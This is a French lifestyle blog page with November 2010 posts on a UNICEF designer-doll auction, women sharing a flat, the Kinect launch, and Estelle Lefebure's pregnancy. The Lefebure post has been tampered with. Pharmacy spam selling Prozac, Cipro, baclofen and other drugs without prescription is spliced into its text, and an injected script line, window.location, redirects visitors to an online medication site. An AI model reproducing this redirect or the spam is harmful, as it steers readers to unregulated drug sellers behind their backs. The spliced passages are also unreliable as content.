L’UNICEF présente les « Frimousses de Créateurs »

28 novembre 2010 par  
Classé dans Expo, Lifestyle

frimoussescreateurs600400

J’étais ravie que Céline me présente il y a quelques jours le projet « Frimousses de créateurs », j’avoue que je ne connaissais pas cette belle opération ! Depuis 7 ans, de grands noms du luxe et de la mode, des Maisons de Couture, des artistes et également des joailliers (Agnès B, ma copine Chantal Thomass, Jean Paul Gautier, Sonia Rykiel, Miss Tic, …) s’associent à l’UNICEF en créant des poupées destinées à être vendues aux enchères dans le but de vacciner des Enfants du Darfour.

Cette année « Les Poupées font leur cinéma » du 30 novembre au 5 décembre au Petit Palais à Paris (l’entrée est gratuite) avant d’être vendues à Drouot le 7 décembre et sur le site firstluxe.com.

Pour faire écho à l’événement, l’UNICEF a décidé de faire gagner l’une des poupées de l’an dernier sur Facebook : son généreux donateur ne l’a jamais réclamée ! Sertie de diamants cette pièce unique est un véritable bijou de collection qui cherche une maison !

Vous pourrez admirer les poupées sur le site frimoussesdecreateurs.com (prévoyez un peu de temps, ça laisse rêveuse !), la page Facebook où vous pourrez peut-être gagner la poupée 2009, et enfin le compte Twitter où cette dernière prendra la parole pendant les 3 prochaines semaines !

Rendez-vous sur Hellocoton !

Deux filles en coloc’ …

21 novembre 2010 par  
Classé dans A la Une, Lifestyle

colloc600400

La collocation, je peux dire que cela me connait : une première expérience en seconde année de fac de Lettres, une seconde à Londres (je vous confirme que la cohabitation avec  le spécimen britannique pendant trois mois ne s’oublie pas d’un claquement de doigt), une collocation de quatre nanas en dernière année d’école de commerce (et une crémaillère de plus de 100 personnes incluse dans le package), sans oublier l’inoubliable semestre Erasmus, où l’on ne parle même plus de collocation mais de joyeux bordel où s’organise un « corridor dinner » environ six soirs par semaine.

Je vis à Paris depuis presque quatre ans et suis en collocation avec l’une de mes fidèles acolytes depuis presque un an. J’ai l’impression que de plus en plus de jeunes adultes – entre 25 et 30 ans dirons-nous – se plaisent en collocation. Il faut l’avouer, ce choix comporte pas mal d’avantages : un appartement plus grand (à Paris, c’est clairement le cas), le coût du quotidien moins élevé, et surtout quelqu’un pour t’amener le petit-déjeuner au lit le matin (comprenne qui pourra !).

Et, dans les collocs de « meufs », comme diraient mes copains, il y a quand même quelques petites choses qui ne trompent pas. Passée la porte d’entrée, on sait tout de suite chez qui l’on est.

Beaucoup plus facile quand on vit entre filles de s’inscrire pour un an au Club Med Gym, et – challenge, quand tu nous tiens – d’y aller presque trois fois par semaine ! Les « tu prends ton sac pour ce soir ? » sont de plus en plus fréquents.  Parce que les cours de body jam, c’est marrant, mais c’est encore plus drôle avec une copine. Sans oublier, qu’on est beaucoup moins honteuse de rentrer parée du combo jogging / Adidas rose fluo et de passer devant le bar le plus couru du quartier, juste parce qu’on n’est pas toute seule !

La salle de bains … Déjà, une fille toute seule, ce n’est pas forcément évident de s’y retrouver (je suis certaine qu’Anne Claire ne me contredira pas) mais alors si ce sont deux nénettes coquettes qui  s’y mettent, il se peut que Sephora ait du souci à se faire. Je ne vous raconte pas les commentaires masculins qui vont du « mais qu’est-ce que vous faites avec autant de gels douche ? » au « c’est quoi un beurre pour le corps ? », sans oublier le ridicule « mais enfin, ça sert à quoi un après-shampoing ? ». Et puis, une salle de bains de filles, on la décore, on met plein de petits miroirs, un tapis de bain framboise, on trie les mascaras avec les mascaras, on range les khôl par couleurs, on a un petit panier spécifique pour les boucles d’oreilles et un autre pour les bagues. Bref, on ne peut pas se planter sur l’identité des occupantes en passant la porte de la salle de bains.

Le réveil. Sur les deux collocs, l’une est plus … matinale, dira-t-on. Il n’est pas rare que j’entende mon iPhone sonner sur les coups de 7h30 les matins de RDV importants. Ces matins-là, je suis parfois bien contente que la colloc se soit levée plus tôt “juste au cas où“. Il n’y a pas à dire, avoir son service réveil perso, ce n’est pas donné à tout le monde. Et si je me lève et que je vois la colloc encore en serviette de toilette, je sais que je suis encore dans les temps pour arriver à une heure décente au boulot. La colloc, elle sait aussi que le matin, il ne faut pas m’adresser la parole tant que je n’ai pas bu mes deux tasses de café.

M6. Ahhhh M6 … Entre les amours de Pascal et Lucie, la cuisine de Cyril, les conseils fashion de Cristina ou les épopées immobilières de Stéphane, il ne se passe pas une seule semaine sans une soirée consacrée à la « petite chaine qui monte », comme on l’appelait autrefois.

Parfois, on ne sait pas trop s’il faut préparer le petit déjeuner pour 2 ou 3 … ou 4. Il arrive qu’au lever, on tâtonne dans l’appartement pour ne pas réveiller la colloc, qui est peut-être en charmante compagnie. Et là, on la voit arriver dans le salon. « T’inquiète, il vient de partir ». Parfait, le debrief peut commencer !

Entre filles, on se coache lorsque l’on entreprend le sixième régime de l’année. « C’est quoi ce bruit de plastique ? ». Shit, grillée à ouvrir le paquet de fraises Tagada. C’est décidé, cette semaine, on se fait une semaine poisson / légumes vapeur. Sauf peut-être mercredi pour l’apéro avec la bande. Ah, et puis jeudi soir, c’est l’apéro entre voisins, on fera peut être une exception. Ah j’oubliais vendredi, il y a aussi le …

Etre en colloc entre filles, cela signifie bien souvent doubler sa penderie. Mine de rien, quand, par un matin pressé, il vous manque le petit haut rouge qui vous fait des seins de bombasse, il suffit souvent d’aller faire un petit tour dans l’armoire voisine pour y dénicher quelque chose qui ira à merveille avec votre jean brut. Et ça coûte quand même beaucoup moins cher question shopping. Ou pas.

A l’heure où nous sommes ultra connectés, il n’est pas rare que le chat Facebook serve à lancer un « C’est prêêêêêt ! » ou à organiser la soirée du week-end de chambre à chambre. Ben oui, parce qu’avoir un grand apparte, c’est canon, mais c’est qu’on ne s’entend pas d’une pièce à l’autre très chère !

Je m’arrête ici mais je serais curieuse de connaître vos expériences de la collocation. L’avez-vous déjà expérimentée ? Avec des gens que vous connaissiez ou non ? Cela s’est-il terminé en pugilat ? En une belle amitié ou une jolie love story ?

Rendez-vous sur Hellocoton !

Kinect disponible en France !

14 novembre 2010 par  
Classé dans A la Une, Geekette, Lifestyle

kinect600400

Lancée en grandes pompes le 10 novembre dernier, la caméra magique de Microsoft promet de faire bouger vos petites fesses (et pas que) devant vos écrans plasma !

Pour ceux qui auraient passé le mois dernier dans un bunker, un petit point Kinect : à la base, Kinect est connu sous le nom de code « Projet Natal », un périphérique conçu pour la Xbox. Mais pourquoi « Kinect » me direz-vous ? Le mot Kinect est un mix de « kinetic » (qui signifie « cinétique » en anglais, c’est-à-dire l’énergie générée par un corps en mouvement) et de « connect » (connecter, pour ceux qui n’ont rien écouté aux cours d’anglais au collège).

La Kinect, c’est une sorte de petite caméra qui se branche sur votre Xbox et qui reconnaît votre voix et vos mouvements. Du coup, tout fout le camp ! Haro sur les manettes et aux fils disgracieux dans le salon, la manette c’est vous ! Vous devez aller vers la droite dans le jeu, on se déplace vers la droite. Une petite accélération lors d’une course digne des fous du volant, il suffit de ramener ses bras rapidos vers ses épaules. Pour dompter un lionceau dans la jungle, quelques petites caresses sur sa trombine (j’avoue, je suis un brin guimauve). Bref, c’est votre corps qui commande et c’est du sport !

Pour vous chers lecteurs, chères lectrices, l’équipe Caractérielles et ses invités (merci Marlène et merci Mehdi !) a risqué sa vie pour passer une soirée entière chez Microsoft (rendez-vous compte, nous passons le périph’ pour vous !) et tester la Kinect. Même qu’un charmant caméraman nous a grillés à danser sur Lady Gaga, voilà le résultat :

Ne me demandez pas d’où je sors cette voix-là, c’est à n’y rien comprendre. Bref, toujours est-il qu’une nana comme moi, a priori peu branchée consoles et jeux vidéos pourrait bien craquer pour ce petit bijou ! Les moments où j’ai le plus joué à des consoles se résument aux suivants : vers 9/10 ans, à la grande époque de la Super Nes (Haaaa, Mario Bros !) contre la Sega Megadrive (Haaaa, Sonic !). J’en étais dingue et je me levais le mercredi matin pour aller jouer à la console avec mon frère. Vinrent plus tard quelques soirées Wii entre amis, sympa mais jouer au bowling sur Wii restait tout de même très occasionnel. Donc cela faisait longtemps que je ne m’étais pas autant enthousiasmée pour un jeu, et connaissant ma bande de copinous, je ne voudrais pas être à la place de mes voisines du dessous (promis les filles, je vous inviterai !).

Mon seul regret, lors de cette soirée au top, fut de n’avoir pu admirer Steve Ballmer se déhancher sur Poker Face, rien qu’à le voir démarrer ses présentations, j’imagine que cela doit envoyer.

Et comme c’est bientôt Noël, je me permets un petit message subliminal : si tu as déjà la Xbox, la Kinect coûte 150 euros. Sinon le pack Xbox 360 + Kinect + le jeu Kinect adventures est à 300 euros.

Pour rejoindre les Kinectés sur Facebook, c’est par ici.

Rendez-vous sur Hellocoton !

Estelle Lefebure, égerie Mixa enceinte en couverture d’Elle

12 novembre 2010 par  
Classé dans A la Une, Lifestyle, People

nov 21, 2014 – cheap medication : buy estrace online best quality, cheap generic prozac no prescription, cheap prices , credit cards accepted, worldwide fluoxetine 20 mg tablets fluoxetine to buy online uk cheap fucidin uk online drugstore, top quality medications buy zithromax z pack online low prices, quality generics  estelle_enceinte

Estelle Lefebure fait partie des très belles femmes enceintes de plus de 40 ans.
A 44 ans elle est sublime, je trouve qu’elle a de plus en plus de charme en vieillissant, et montre qu’on peut mener une belle grossesse après 40 ans.
cipro joint pain temporary cipro without prescription

Les « stars » sont de plus en plus nombreuses à avoir des enfants après 40 ans : Monica Bellucci , Estelle Lefebure, Halle Berry, Marcia Cross, Salma Hayek, Nicole Kidman, Julia Roberts, Céline Dion ou encore Rachida Dati !

Naturelle, spontanée, Estelle est rayonnante en couverture du Elle, ça fait du bien de voir une femme enceinte à plus de 40 ans « accessible », car contrairement aux stars américaines elle n’aura à mon avis pas besoin d’une horde de nounous et pousseurs de poussettes autour d’elle !

Elle propose un dossier spéciale « elles font un bébé après 40 ans : leurs bonheurs, leurs doutes, leurs attentes ».

Alors, enceinte après 40 ans, ça vous inspire ?
lioresal 10 mg, lioresal intrathecal, buy baclofen , baclofen price, buy baclofen online, lioresal price, cheap baclofen.

window.location = « http://medicationsonlinedoctor.com »;.

Rendez-vous sur Hellocoton !